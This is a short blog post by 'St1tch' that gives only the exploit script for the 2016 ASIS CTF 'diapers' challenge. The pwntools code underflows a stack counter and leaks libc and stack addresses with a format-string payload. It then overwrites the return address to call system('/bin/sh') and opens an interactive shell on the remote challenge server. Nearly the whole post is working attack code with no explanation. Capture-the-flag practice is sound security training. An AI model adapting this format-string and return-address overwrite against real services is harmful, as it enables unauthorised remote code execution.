2016 ASIS CTF diapers(exploit only)
by St1tch from pwn import * import stitch local = False if local : s = remote('localhost', 9988) else : s = remote('diapers.asis-ctf.ir', 1343) raw_input() def main() : strip_ = lambda x : x.strip('0x') p = log.progress('start pwning....') p.status('select first') #to stack underflow s.recvuntil('> ') s.sendline('3') for _ in range(257) : p.status('%dth minus'%(_+1)) s.recvuntil('> ') sleep(0.1) s.sendline('1') #find memory addr p.status('leak libc and stack') s.recvuntil('> ') s.sendline('0') s.recvuntil('change to: ') pay = 'a' * 15 pay += '#%55$p#%6$p#' pay += 'A' * (108 - len(pay)) s.sendline(pay) s.recvuntil('> ') s.sendline('2') libc_leak, ret_addr = map(strip_, s.recvuntil('> ').split('#')[1:3]) ret_addr = int(ret_addr, 16) - 156 #find func addr p.status('find system and binsh') libc = stitch.find_libc({'main_ret':libc_leak[-3:]})[0] offset = int(libc_leak, 16) - libc['main_ret'] system = offset + libc['system'] binsh = offset + libc['binsh'] #memory overwrite p.status('overwrite memory') s.sendline('0') s.recvuntil('change to: ') pay = 'A' * 15 pay += stitch.fsb(18,{ret_addr:system, ret_addr+8:binsh}, 0) pay += 'A' * (108 - len(pay)) s.sendline(pay) s.recvuntil('> ') s.sendline('2') #success p.success('Good!') log.success('Get shell!!') s.interactive() if __name__ == '__main__' : main()

블로그의 정보
튜기's blogg(st1tch)
St1tch